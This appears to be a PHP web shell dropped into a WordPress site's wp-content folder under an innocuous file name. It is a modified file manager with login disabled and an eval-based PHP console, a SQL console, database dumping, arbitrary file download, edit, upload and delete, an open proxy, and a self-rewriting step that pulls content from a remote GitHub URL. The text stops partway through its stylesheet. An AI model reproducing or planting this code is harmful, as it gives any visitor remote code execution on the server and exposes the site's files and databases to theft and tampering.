File: /home/nhqyemt2u0zd/www/wp-content/congab.php
*&……*&……%¥#*)(*
<?php
// ^%^&*(Configuration — do not change manually!
$authorization = \'{\"authorize\":\"0\",\"login\":\"admin\",\"password\":\"phpfm\",\"cookie_name\":\"fm_user\",\"days_authorization\":\"30\",\"script\":\"\"}\';
$php_templates = \'{\"Settings\":\"global $fm_config;\\r\\nvar_export($fm_config);\",\"Backup SQL tables\":\"echo fm_backup_tables();\"}\';
$sql_templates = \'{\"All bases\":\"SHOW DATABASES;\",\"All tables\":\"SHOW TABLES;\"}\';
$translation = \'{\"id\":\"ru\",\"Add\":\"Добавить\",\"Are you sure you want to delete this directory (recursively)?\":\"Вы уверены, что хотите удалить эту папку (рекурсивно)?\",\"Are you sure you want to delete this file?\":\"Вы уверены, что хотите удалить этот файл?\",\"Archiving\":\"Архивировать\",\"Authorization\":\"Авторизация\",\"Back\":\"Назад\",\"Cancel\":\"Отмена\",\"Chinese\":\"Китайский\",\"Compress\":\"Сжать\",\"Console\":\"Консоль\",\"Cookie\":\"Куки\",\"Created\":\"Создан\",\"Date\":\"Дата\",\"Days\":\"Дней\",\"Decompress\":\"Распаковать\",\"Delete\":\"Удалить\",\"Deleted\":\"Удалено\",\"Download\":\"Скачать\",\"done\":\"закончена\",\"Edit\":\"Редактировать\",\"Enter\":\"Вход\",\"English\":\"Английский\",\"Error occurred\":\"Произошла ошибка\",\"File manager\":\"Файловый менеджер\",\"File selected\":\"Выбран файл\",\"File updated\":\"Файл сохранен\",\"Filename\":\"Имя файла\",\"Files uploaded\":\"Файл загружен\",\"French\":\"Французский\",\"Generation time\":\"Генерация страницы\",\"German\":\"Немецкий\",\"Home\":\"Домой\",\"Quit\":\"Выход\",\"Language\":\"Язык\",\"Login\":\"Логин\",\"Manage\":\"Управление\",\"Make directory\":\"Создать папку\",\"Name\":\"Наименование\",\"New\":\"Новое\",\"New file\":\"Новый файл\",\"no files\":\"нет файлов\",\"Password\":\"Пароль\",\"pictures\":\"изображения\",\"Recursively\":\"Рекурсивно\",\"Rename\":\"Переименовать\",\"Reset\":\"Сбросить\",\"Reset settings\":\"Сбросить настройки\",\"Restore file time after editing\":\"Восстанавливать время файла после редактирования\",\"Result\":\"Результат\",\"Rights\":\"Права\",\"Russian\":\"Русский\",\"Save\":\"Сохранить\",\"Select\":\"Выберите\",\"Select the file\":\"Выберите файл\",\"Settings\":\"Настройка\",\"Show\":\"Показать\",\"Show size of the folder\":\"Показывать размер папки\",\"Size\":\"Размер\",\"Spanish\":\"Испанский\",\"Submit\":\"Отправить\",\"Task\":\"Задача\",\"templates\":\"шаблоны\",\"Ukrainian\":\"Украинский\",\"Upload\":\"Загрузить\",\"Value\":\"Значение\",\"Hello\":\"Привет\",\"Found in files\":\"Найдено в файлах\",\"Search\":\"Поиск\",\"Recursive search\": \"Рекурсивный поиск\",\"Mask\":\"Маска\"}\';
// end configuration
$starttime = explode(\' \', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs = array(\'en\',\'ru\',\'de\',\'fr\',\'uk\');
$path = empty($_REQUEST[\'path\']) ? $path = realpath(\'.\') : realpath($_REQUEST[\'path\']);
$path = str_replace(\'\\\\\', \'/\', $path) . \'/\';
$main_path=str_replace(\'\\\\\', \'/\',realpath(\'./\'));
$phar_maybe = (version_compare(phpversion(),\"5.3.0\",\"<\"))?true:false;
$msg = \'\'; // service string
$default_language = \'ru\';
$detect_lang = true;
$fm_version = 1.6;
ini_set(\'display_errors\', \'1\');
ini_set(\'display_startup_errors\', \'1\');
error_reporting(E_ALL);
//Authorization
$auth = json_decode($authorization,true);
$auth[\'authorize\'] = isset($auth[\'authorize\']) ? $auth[\'authorize\'] : 0;
$auth[\'days_authorization\'] = (isset($auth[\'days_authorization\'])&&is_numeric($auth[\'days_authorization\'])) ? (int)$auth[\'days_authorization\'] : 30;
$auth[\'login\'] = isset($auth[\'login\']) ? $auth[\'login\'] : \'admin\';
$auth[\'password\'] = isset($auth[\'password\']) ? $auth[\'password\'] : \'phpfm\';
$auth[\'cookie_name\'] = isset($auth[\'cookie_name\']) ? $auth[\'cookie_name\'] : \'fm_user\';
$auth[\'script\'] = isset($auth[\'script\']) ? $auth[\'script\'] : \'\';
// Little default config
$fm_default_config = array (
\'make_directory\' => true,
\'new_file\' => true,
\'upload_file\' => true,
\'show_dir_size\' => false, //if true, show directory size → maybe slow
\'show_img\' => true,
\'show_php_ver\' => true,
\'show_php_ini\' => false, // show path to current php.ini
\'show_gt\' => true, // show generation time
\'enable_php_console\' => true,
\'enable_sql_console\' => true,
\'sql_server\' => \'localhost\',
\'sql_username\' => \'root\',
\'sql_password\' => \'\',
\'sql_db\' => \'test_base\',
\'enable_proxy\' => true,
\'show_phpinfo\' => true,
\'show_xls\' => true,
\'fm_settings\' => true,
\'restore_time\' => true,
\'fm_restore_time\' => false,
);
if (empty($_COOKIE[\'fm_config\'])) $fm_config = $fm_default_config;
else $fm_config = unserialize($_COOKIE[\'fm_config\']);
// Change language
if (isset($_POST[\'fm_lang\'])) {
setcookie(\'fm_lang\', $_POST[\'fm_lang\'], time() + (86400 * $auth[\'days_authorization\']));
$_COOKIE[\'fm_lang\'] = $_POST[\'fm_lang\'];
}
$language = $default_language;
// Detect browser language
if($detect_lang && !empty($_SERVER[\'HTTP_ACCEPT_LANGUAGE\']) && empty($_COOKIE[\'fm_lang\'])){
$lang_priority = explode(\',\', $_SERVER[\'HTTP_ACCEPT_LANGUAGE\']);
if (!empty($lang_priority)){
foreach ($lang_priority as $lang_arr){
$lng = explode(\';\', $lang_arr);
$lng = $lng[0];
if(in_array($lng,$langs)){
$language = $lng;
break;
}
}
}
}
// Cookie language is primary for ever
$language = (empty($_COOKIE[\'fm_lang\'])) ? $language : $_COOKIE[\'fm_lang\'];
// Localization
$lang = json_decode($translation,true);
if ($lang[\'id\']!=$language) {
$get_lang = file_get_contents(\'https://raw.githubusercontent.com/bayu123-cpu/goat/refs/heads/main/goat.php\' . $language . \'.json\');
if (!empty($get_lang)) {
//remove unnecessary characters
$translation_string = str_replace(\"\'\",\''\',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE));
$fgc = file_get_contents(__FILE__);
$search = preg_match(\'#translation[\\s]?\\=[\\s]?\\\'\\{\\\"(.*?)\\\"\\}\\\';#\', $fgc, $matches);
if (!empty($matches[1])) {
$filemtime = filemtime(__FILE__);
$replace = str_replace(\'{\"\'.$matches[1].\'\"}\',$translation_string,$fgc);
if (file_put_contents(__FILE__, $replace)) {
$msg .= __(\'File updated\');
} else $msg .= __(\'Error occurred\');
if (!empty($fm_config[\'fm_restore_time\'])) touch(__FILE__,$filemtime);
}
$lang = json_decode($translation_string,true);
}
}
/* Functions */
//translation
function __($text){
global $lang;
if (isset($lang[$text])) return $lang[$text];
else return $text;
};
//delete files and dirs recursively
function fm_del_files($file, $recursive = false) {
if($recursive && @is_dir($file)) {
$els = fm_scan_dir($file, \'\', \'\', true);
foreach ($els as $el) {
if($el != \'.\' && $el != \'..\'){
fm_del_files($file . \'/\' . $el, true);
}
}
}
if(@is_dir($file)) {
return rmdir($file);
} else {
return @unlink($file);
}
}
//file perms
function fm_rights_string($file, $if = false){
$perms = fileperms($file);
$info = \'\';
if(!$if){
if (($perms & 0xC000) == 0xC000) {
//Socket
$info = \'s\';
} elseif (($perms & 0xA000) == 0xA000) {
//Symbolic Link
$info = \'l\';
} elseif (($perms & 0x8000) == 0x8000) {
//Regular
$info = \'-\';
} elseif (($perms & 0x6000) == 0x6000) {
//Block special
$info = \'b\';
} elseif (($perms & 0x4000) == 0x4000) {
//Directory
$info = \'d\';
} elseif (($perms & 0x2000) == 0x2000) {
//Character special
$info = \'c\';
} elseif (($perms & 0x1000) == 0x1000) {
//FIFO pipe
$info = \'p\';
} else {
//Unknown
$info = \'u\';
}
}
//Owner
$info .= (($perms & 0x0100) ? \'r\' : \'-\');
$info .= (($perms & 0x0080) ? \'w\' : \'-\');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? \'s\' : \'x\' ) :
(($perms & 0x0800) ? \'S\' : \'-\'));
//Group
$info .= (($perms & 0x0020) ? \'r\' : \'-\');
$info .= (($perms & 0x0010) ? \'w\' : \'-\');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? \'s\' : \'x\' ) :
(($perms & 0x0400) ? \'S\' : \'-\'));
//World
$info .= (($perms & 0x0004) ? \'r\' : \'-\');
$info .= (($perms & 0x0002) ? \'w\' : \'-\');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? \'t\' : \'x\' ) :
(($perms & 0x0200) ? \'T\' : \'-\'));
return $info;
}
function fm_convert_rights($mode) {
$mode = str_pad($mode,9,\'-\');
$trans = array(\'-\'=>\'0\',\'r\'=>\'4\',\'w\'=>\'2\',\'x\'=>\'1\');
$mode = strtr($mode,$trans);
$newmode = \'0\';
$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2];
$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5];
$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8];
$newmode .= $owner . $group . $world;
return intval($newmode, 8);
}
function fm_chmod($file, $val, $rec = false) {
$res = @chmod(realpath($file), $val);
if(@is_dir($file) && $rec){
$els = fm_scan_dir($file);
foreach ($els as $el) {
$res = $res && fm_chmod($file . \'/\' . $el, $val, true);
}
}
return $res;
}
//load files
function fm_download($file_name) {
if (!empty($file_name)) {
if (file_exists($file_name)) {
header(\"Content-Disposition: attachment; filename=\" . basename($file_name));
header(\"Content-Type: application/force-download\");
header(\"Content-Type: application/octet-stream\");
header(\"Content-Type: application/download\");
header(\"Content-Description: File Transfer\");
header(\"Content-Length: \" . filesize($file_name));
flush(); // this doesn\'t really matter.
$fp = fopen($file_name, \"r\");
while (!feof($fp)) {
echo fread($fp, 65536);
flush(); // this is essential for large downloads
}
fclose($fp);
die();
} else {
header(\'HTTP/1.0 404 Not Found\', true, 404);
header(\'Status: 404 Not Found\');
die();
}
}
}
//show folder size
function fm_dir_size($f,$format=true) {
if($format) {
$size=fm_dir_size($f,false);
if($size<=1024) return $size.\' bytes\';
elseif($size<=1024*1024) return round($size/(1024),2).\' Kb\';
elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).\' Mb\';
elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).\' Gb\';
elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).\' Tb\'; //:)))
else return round($size/(1024*1024*1024*1024*1024),2).\' Pb\'; // ;-)
} else {
if(is_file($f)) return filesize($f);
$size=0;
$dh=opendir($f);
while(($file=readdir($dh))!==false) {
if($file==\'.\' || $file==\'..\') continue;
if(is_file($f.\'/\'.$file)) $size+=filesize($f.\'/\'.$file);
else $size+=fm_dir_size($f.\'/\'.$file,false);
}
closedir($dh);
return $size+filesize($f);
}
}
//scan directory
function fm_scan_dir($directory, $exp = \'\', $type = \'all\', $do_not_filter = false) {
$dir = $ndir = array();
if(!empty($exp)){
$exp = \'/^\' . str_replace(\'*\', \'(.*)\', str_replace(\'.\', \'\\\\.\', $exp)) . \'$/\';
}
if(!empty($type) && $type !== \'all\'){
$func = \'is_\' . $type;
}
if(@is_dir($directory)){
$fh = opendir($directory);
while (false !== ($filename = readdir($fh))) {
if(substr($filename, 0, 1) != \'.\' || $do_not_filter) {
if((empty($type) || $type == \'all\' || $func($directory . \'/\' . $filename)) && (empty($exp) || preg_match($exp, $filename))){
$dir[] = $filename;
}
}
}
closedir($fh);
natsort($dir);
}
return $dir;
}
function fm_link($get,$link,$name,$title=\'\') {
if (empty($title)) $title=$name.\' \'.basename($link);
return \' <a href=\"?\'.$get.\'=\'.base64_encode($link).\'\" title=\"\'.$title.\'\">\'.$name.\'</a>\';
}
function fm_arr_to_option($arr,$n,$sel=\'\'){
foreach($arr as $v){
$b=$v[$n];
$res.=\'<option value=\"\'.$b.\'\" \'.($sel && $sel==$b?\'selected\':\'\').\'>\'.$b.\'</option>\';
}
return $res;
}
function fm_lang_form ($current=\'en\'){
return \'
<form name=\"change_lang\" method=\"post\" action=\"\">
<select name=\"fm_lang\" title=\"\'.__(\'Language\').\'\" onchange=\"document.forms[\\\'change_lang\\\'].submit()\" >
<option value=\"en\" \'.($current==\'en\'?\'selected=\"selected\" \':\'\').\'>\'.__(\'English\').\'</option>
<option value=\"de\" \'.($current==\'de\'?\'selected=\"selected\" \':\'\').\'>\'.__(\'German\').\'</option>
<option value=\"ru\" \'.($current==\'ru\'?\'selected=\"selected\" \':\'\').\'>\'.__(\'Russian\').\'</option>
<option value=\"fr\" \'.($current==\'fr\'?\'selected=\"selected\" \':\'\').\'>\'.__(\'French\').\'</option>
<option value=\"uk\" \'.($current==\'uk\'?\'selected=\"selected\" \':\'\').\'>\'.__(\'Ukrainian\').\'</option>
</select>
</form>
\';
}
function fm_root($dirname){
return ($dirname==\'.\' OR $dirname==\'..\');
}
function fm_php($string){
$display_errors=ini_get(\'display_errors\');
ini_set(\'display_errors\', \'1\');
ob_start();
eval(trim($string));
$text = ob_get_contents();
ob_end_clean();
ini_set(\'display_errors\', $display_errors);
return $text;
}
//SHOW DATABASES
function fm_sql_connect(){
global $fm_config;
return new mysqli($fm_config[\'sql_server\'], $fm_config[\'sql_username\'], $fm_config[\'sql_password\'], $fm_config[\'sql_db\']);
}
function fm_sql($query){
global $fm_config;
$query=trim($query);
ob_start();
$connection = fm_sql_connect();
if ($connection->connect_error) {
ob_end_clean();
return $connection->connect_error;
}
$connection->set_charset(\'utf8\');
$queried = mysqli_query($connection,$query);
if ($queried===false) {
ob_end_clean();
return mysqli_error($connection);
} else {
if(!empty($queried)){
while($row = mysqli_fetch_assoc($queried)) {
$query_result[]= $row;
}
}
$vdump=empty($query_result)?\'\':var_export($query_result,true);
ob_end_clean();
$connection->close();
return \'<pre>\'.stripslashes($vdump).\'</pre>\';
}
}
function fm_backup_tables($tables = \'*\', $full_backup = true) {
global $path;
$mysqldb = fm_sql_connect();
$delimiter = \"; \\n \\n\";
if($tables == \'*\') {
$tables = array();
$result = $mysqldb->query(\'SHOW TABLES\');
while($row = mysqli_fetch_row($result)) {
$tables[] = $row[0];
}
} else {
$tables = is_array($tables) ? $tables : explode(\',\',$tables);
}
$return=\'\';
foreach($tables as $table) {
$result = $mysqldb->query(\'SELECT * FROM \'.$table);
$num_fields = mysqli_num_fields($result);
$return.= \'DROP TABLE IF EXISTS `\'.$table.\'`\'.$delimiter;
$row2 = mysqli_fetch_row($mysqldb->query(\'SHOW CREATE TABLE \'.$table));
$return.=$row2[1].$delimiter;
if ($full_backup) {
for ($i = 0; $i < $num_fields; $i++) {
while($row = mysqli_fetch_row($result)) {
$return.= \'INSERT INTO `\'.$table.\'` VALUES(\';
for($j=0; $j<$num_fields; $j++) {
$row[$j] = addslashes($row[$j]);
$row[$j] = str_replace(\"\\n\",\"\\\\n\",$row[$j]);
if (isset($row[$j])) { $return.= \'\"\'.$row[$j].\'\"\' ; } else { $return.= \'\"\"\'; }
if ($j<($num_fields-1)) { $return.= \',\'; }
}
$return.= \')\'.$delimiter;
}
}
} else {
$return = preg_replace(\"#AUTO_INCREMENT=[\\d]+ #is\", \'\', $return);
}
$return.=\"\\n\\n\\n\";
}
//save file
$file=gmdate(\"Y-m-d_H-i-s\",time()).\'.sql\';
$handle = fopen($file,\'w+\');
fwrite($handle,$return);
fclose($handle);
$alert = \'onClick=\"if(confirm(\\\'\'. __(\'File selected\').\': \\n\'. $file. \'. \\n\'.__(\'Are you sure you want to delete this file?\') . \'\\\')) document.location.href = \\\'?delete=\' . $file . \'&path=\' . $path . \'\\\'\"\';
return $file.\': \'.fm_link(\'download\',$path.$file,__(\'Download\'),__(\'Download\').\' \'.$file).\' <a href=\"#\" title=\"\' . __(\'Delete\') . \' \'. $file . \'\" \' . $alert . \'>\' . __(\'Delete\') . \'</a>\';
}
function fm_restore_tables($sqlFileToExecute) {
$mysqldb = fm_sql_connect();
$delimiter = \"; \\n \\n\";
// Load and explode the sql file
$f = fopen($sqlFileToExecute,\"r+\");
$sqlFile = fread($f,filesize($sqlFileToExecute));
$sqlArray = explode($delimiter,$sqlFile);
//Process the sql file by statements
foreach ($sqlArray as $stmt) {
if (strlen($stmt)>3){
$result = $mysqldb->query($stmt);
if (!$result){
$sqlErrorCode = mysqli_errno($mysqldb->connection);
$sqlErrorText = mysqli_error($mysqldb->connection);
$sqlStmt = $stmt;
break;
}
}
}
if (empty($sqlErrorCode)) return __(\'Success\').\' — \'.$sqlFileToExecute;
else return $sqlErrorText.\'<br/>\'.$stmt;
}
function fm_img_link($filename){
return \'./\'.basename(__FILE__).\'?img=\'.base64_encode($filename);
}
function fm_home_style(){
return \'
input, input.fm_input {
text-indent: 2px;
}
input, textarea, select, input.fm_input {
color: black;
font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
border-color: black;
background-color: #FCFCFC none !important;
border-radius: 0;
padding: 2px;
}
input.fm_input {
background: #FCFCFC none !important;
cursor: pointer;
}
.home {
background-image: url(\"\");
background-repeat: no-repeat;
}\';
}
function fm_config_checkbox_row($name,$value) {
global $fm_config;
return \'<tr><td class=\"row1\"><input id=\"fm_config_\'.$value.\'\" name=\"fm_config[\'.$value.\']\" value=\"1\" \'.(empty($fm_config[$value])?\'\':\'checked=\"true\"\').\' type=\"checkbox\"></td><td class=\"row2 whole\"><label for=\"fm_config_\'.$value.\'\">\'.$name.\'</td></tr>\';
}
function fm_protocol() {
if (isset($_SERVER[\'HTTP_SCHEME\'])) return $_SERVER[\'HTTP_SCHEME\'].\'://\';
if (isset($_SERVER[\'HTTPS\']) && $_SERVER[\'HTTPS\'] == \'on\') return \'https://\';
if (isset($_SERVER[\'SERVER_PORT\']) && $_SERVER[\'SERVER_PORT\'] == 443) return \'https://\';
if (isset($_SERVER[\'HTTP_X_FORWARDED_PROTO\']) && $_SERVER[\'HTTP_X_FORWARDED_PROTO\'] == \'https\') return \'https://\';
return \'http://\';
}
function fm_site_url() {
return fm_protocol().$_SERVER[\'HTTP_HOST\'];
}
function fm_url($full=false) {
$host=$full?fm_site_url():\'.\';
return $host.\'/\'.basename(__FILE__);
}
function fm_home($full=false){
return \' <a href=\"\'.fm_url($full).\'\" title=\"\'.__(\'Home\').\'\"><span class=\"home\"> </span></a>\';
}
function fm_run_input($lng) {
global $fm_config;
$return = !empty($fm_config[\'enable_\'.$lng.\'_console\']) ?
\'
<form method=\"post\" action=\"\'.fm_url().\'\" style=\"display:inline\">
<input type=\"submit\" name=\"\'.$lng.\'run\" value=\"\'.strtoupper($lng).\' \'.__(\'Console\').\'\">
</form>
\' : \'\';
return $return;
}
function fm_url_proxy($matches) {
$link = str_replace(\'&\',\'&\',$matches[2]);
$url = isset($_GET[\'url\'])?$_GET[\'url\']:\'\';
$parse_url = parse_url($url);
$host = $parse_url[\'scheme\'].\'://\'.$parse_url[\'host\'].\'/\';
if (substr($link,0,2)==\'//\') {
$link = substr_replace($link,fm_protocol(),0,2);
} elseif (substr($link,0,1)==\'/\') {
$link = substr_replace($link,$host,0,1);
} elseif (substr($link,0,2)==\'./\') {
$link = substr_replace($link,$host,0,2);
} elseif (substr($link,0,4)==\'http\') {
//alles machen wunderschon
} else {
$link = $host.$link;
}
if ($matches[1]==\'href\' && !strripos($link, \'css\')) {
$base = fm_site_url().\'/\'.basename(__FILE__);
$baseq = $base.\'?proxy=true&url=\';
$link = $baseq.urlencode($link);
} elseif (strripos($link, \'css\')){
//как-то тоже подменять надо
}
return $matches[1].\'=\"\'.$link.\'\"\';
}
function fm_tpl_form($lng_tpl) {
global ${$lng_tpl.\'_templates\'};
$tpl_arr = json_decode(${$lng_tpl.\'_templates\'},true);
$str = \'\';
foreach ($tpl_arr as $ktpl=>$vtpl) {
$str .= \'<tr><td class=\"row1\"><input name=\"\'.$lng_tpl.\'_name[]\" value=\"\'.$ktpl.\'\"></td><td class=\"row2 whole\"><textarea name=\"\'.$lng_tpl.\'_value[]\" cols=\"55\" rows=\"5\" class=\"textarea_input\">\'.$vtpl.\'</textarea> <input name=\"del_\'.rand().\'\" type=\"button\" onClick=\"this.parentNode.parentNode.remove();\" value=\"\'.__(\'Delete\').\'\"/></td></tr>\';
}
return \'
<table>
<tr><th colspan=\"2\">\'.strtoupper($lng_tpl).\' \'.__(\'templates\').\' \'.fm_run_input($lng_tpl).\'</th></tr>
<form method=\"post\" action=\"\">
<input type=\"hidden\" value=\"\'.$lng_tpl.\'\" name=\"tpl_edited\">
<tr><td class=\"row1\">\'.__(\'Name\').\'</td><td class=\"row2 whole\">\'.__(\'Value\').\'</td></tr>
\'.$str.\'
<tr><td colspan=\"2\" class=\"row3\"><input name=\"res\" type=\"button\" onClick=\"document.location.href = \\\'\'.fm_url().\'?fm_settings=true\\\';\" value=\"\'.__(\'Reset\').\'\"/> <input type=\"submit\" value=\"\'.__(\'Save\').\'\" ></td></tr>
</form>
<form method=\"post\" action=\"\">
<input type=\"hidden\" value=\"\'.$lng_tpl.\'\" name=\"tpl_edited\">
<tr><td class=\"row1\"><input name=\"\'.$lng_tpl.\'_new_name\" value=\"\" placeholder=\"\'.__(\'New\').\' \'.__(\'Name\').\'\"></td><td class=\"row2 whole\"><textarea name=\"\'.$lng_tpl.\'_new_value\" cols=\"55\" rows=\"5\" class=\"textarea_input\" placeholder=\"\'.__(\'New\').\' \'.__(\'Value\').\'\"></textarea></td></tr>
<tr><td colspan=\"2\" class=\"row3\"><input type=\"submit\" value=\"\'.__(\'Add\').\'\" ></td></tr>
</form>
</table>
\';
}
function find_text_in_files($dir, $mask, $text) {
$results = array();
if ($handle = opendir($dir)) {
while (false !== ($entry = readdir($handle))) {
if ($entry != \".\" && $entry != \"..\") {
$path = $dir . \"/\" . $entry;
if (is_dir($path)) {
$results = array_merge($results, find_text_in_files($path, $mask, $text));
} else {
if (fnmatch($mask, $entry)) {
$contents = file_get_contents($path);
if (strpos($contents, $text) !== false) {
$results[] = str_replace(\'//\', \'/\', $path);
}
}
}
}
}
closedir($handle);
}
return $results;
}
/* End Functions */
// authorization
if ($auth[\'authorize\']) {
if (isset($_POST[\'login\']) && isset($_POST[\'password\'])){
if (($_POST[\'login\']==$auth[\'login\']) && ($_POST[\'password\']==$auth[\'password\'])) {
setcookie($auth[\'cookie_name\'], $auth[\'login\'].\'|\'.md5($auth[\'password\']), time() + (86400 * $auth[\'days_authorization\']));
$_COOKIE[$auth[\'cookie_name\']]=$auth[\'login\'].\'|\'.md5($auth[\'password\']);
}
}
if (!isset($_COOKIE[$auth[\'cookie_name\']]) OR ($_COOKIE[$auth[\'cookie_name\']]!=$auth[\'login\'].\'|\'.md5($auth[\'password\']))) {
echo \'
<!doctype html>
<html>
<head>
<meta charset=\"utf-8\" />
<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />
<title>\'.__(\'File manager\').\'</title>
</head>
<body>
<form action=\"\" method=\"post\">
\'.__(\'Login\').\' <input name=\"login\" type=\"text\">
\'.__(\'Password\').\' <input name=\"password\" type=\"password\">
<input type=\"submit\" value=\"\'.__(\'Enter\').\'\" class=\"fm_input\">
</form>
\'.fm_lang_form($language).\'
</body>
</html>
\';
die();
}
if (isset($_POST[\'quit\'])) {
unset($_COOKIE[$auth[\'cookie_name\']]);
setcookie($auth[\'cookie_name\'], \'\', time() - (86400 * $auth[\'days_authorization\']));
header(\'Location: \'.fm_site_url().$_SERVER[\'REQUEST_URI\']);
}
}
// Change config
if (isset($_GET[\'fm_settings\'])) {
if (isset($_GET[\'fm_config_delete\'])) {
unset($_COOKIE[\'fm_config\']);
setcookie(\'fm_config\', \'\', time() - (86400 * $auth[\'days_authorization\']));
header(\'Location: \'.fm_url().\'?fm_settings=true\');
exit(0);
} elseif (isset($_POST[\'fm_config\'])) {
$fm_config = $_POST[\'fm_config\'];
setcookie(\'fm_config\', serialize($fm_config), time() + (86400 * $auth[\'days_authorization\']));
$_COOKIE[\'fm_config\'] = serialize($fm_config);
$msg = __(\'Settings\').\' \'.__(\'done\');
} elseif (isset($_POST[\'fm_login\'])) {
if (empty($_POST[\'fm_login\'][\'authorize\'])) $_POST[\'fm_login\'] = array(\'authorize\' => \'0\') + $_POST[\'fm_login\'];
$fm_login = json_encode($_POST[\'fm_login\']);
$fgc = file_get_contents(__FILE__);
$search = preg_match(\'#authorization[\\s]?\\=[\\s]?\\\'\\{\\\"(.*?)\\\"\\}\\\';#\', $fgc, $matches);
if (!empty($matches[1])) {
$filemtime = filemtime(__FILE__);
$replace = str_replace(\'{\"\'.$matches[1].\'\"}\',$fm_login,$fgc);
if (file_put_contents(__FILE__, $replace)) {
$msg .= __(\'File updated\');
if ($_POST[\'fm_login\'][\'login\'] != $auth[\'login\']) $msg .= \' \'.__(\'Login\').\': \'.$_POST[\'fm_login\'][\'login\'];
if ($_POST[\'fm_login\'][\'password\'] != $auth[\'password\']) $msg .= \' \'.__(\'Password\').\': \'.$_POST[\'fm_login\'][\'password\'];
$auth = $_POST[\'fm_login\'];
}
else $msg .= __(\'Error occurred\');
if (!empty($fm_config[\'fm_restore_time\'])) touch(__FILE__,$filemtime);
}
} elseif (isset($_POST[\'tpl_edited\'])) {
$lng_tpl = $_POST[\'tpl_edited\'];
if (!empty($_POST[$lng_tpl.\'_name\'])) {
$fm_php = json_encode(array_combine($_POST[$lng_tpl.\'_name\'],$_POST[$lng_tpl.\'_value\']),JSON_HEX_APOS);
} elseif (!empty($_POST[$lng_tpl.\'_new_name\'])) {
$fm_php = json_encode(json_decode(${$lng_tpl.\'_templates\'},true)+array($_POST[$lng_tpl.\'_new_name\']=>$_POST[$lng_tpl.\'_new_value\']),JSON_HEX_APOS);
}
if (!empty($fm_php)) {
$fgc = file_get_contents(__FILE__);
$search = preg_match(\'#\'.$lng_tpl.\'_templates[\\s]?\\=[\\s]?\\\'\\{\\\"(.*?)\\\"\\}\\\';#\', $fgc, $matches);
if (!empty($matches[1])) {
$filemtime = filemtime(__FILE__);
$replace = str_replace(\'{\"\'.$matches[1].\'\"}\',$fm_php,$fgc);
if (file_put_contents(__FILE__, $replace)) {
${$lng_tpl.\'_templates\'} = $fm_php;
$msg .= __(\'File updated\');
} else $msg .= __(\'Error occurred\');
if (!empty($fm_config[\'fm_restore_time\'])) touch(__FILE__,$filemtime);
}
} else $msg .= __(\'Error occurred\');
}
}
// Just show image
if (isset($_GET[\'img\'])) {
$file=base64_decode($_GET[\'img\']);
if ($info=getimagesize($file)){
switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
case 1: $ext=\'gif\'; break;
case 2: $ext=\'jpeg\'; break;
case 3: $ext=\'png\'; break;
case 6: $ext=\'bmp\'; break;
default: die();
}
header(\"Content-type: image/$ext\");
echo file_get_contents($file);
die();
}
}
// Just download file
if (isset($_GET[\'download\'])) {
$file=base64_decode($_GET[\'download\']);
fm_download($file);
}
// Just show info
if (isset($_GET[\'phpinfo\'])) {
phpinfo();
die();
}
// Mini proxy, many bugs!
if (isset($_GET[\'proxy\']) && (!empty($fm_config[\'enable_proxy\']))) {
$url = isset($_GET[\'url\'])?urldecode($_GET[\'url\']):\'\';
$proxy_form = \'
<div style=\"position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);\">
<form action=\"\" method=\"GET\">
<input type=\"hidden\" name=\"proxy\" value=\"true\">
\'.fm_home().\' <a href=\"\'.$url.\'\" target=\"_blank\">Url</a>: <input type=\"text\" name=\"url\" value=\"\'.$url.\'\" size=\"55\">
<input type=\"submit\" value=\"\'.__(\'Show\').\'\" class=\"fm_input\">
</form>
</div>
\';
if ($url) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_USERAGENT, \'Den1xxx test proxy\');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
$result = curl_exec($ch);
curl_close($ch);
//$result = preg_replace(\'#(src)=[\"\\\'][http://]?([^:]*)[\"\\\']#Ui\', \'\\\\1=\"\'.$url.\'/\\\\2\"\', $result);
$result = preg_replace_callback(\'#(href|src)=[\"\\\'][http://]?([^:]*)[\"\\\']#Ui\', \'fm_url_proxy\', $result);
$result = preg_replace(\'%(<body.*?>)%i\', \'$1\'.\'<style>\'.fm_home_style().\'</style>\'.$proxy_form, $result);
echo $result;
die();
}
}
?>
<!doctype html>
<html>
<head>
<meta charset=\"utf-8\" />
<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />
<title><?=__(\'File manager\')?></title>
<style>
body {
background-color: white;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 8pt;
margin: 0px;
}
a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover { color: #FFA34F; text-decoration: underline; }
table.bg {
background-color: #ACBBC6
}
th, td {
font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
padding: 3px;
}
th {
height: 25px;
background-color: #006699;
color: #FFA34F;
font-weight: bold;
font-size: 11px;
}
.row1 {
background-color: #EFEFEF;
}
.row2 {
background-color: #DEE3E7;
}
.row3 {
background-color: #D1D7DC;
padding: 5px;
}
tr.row1:hover {
background-color: #F3FCFC;
}
tr.row2:hover {
background-color: #F0F6F6;
}
.whole {
width: 100%;
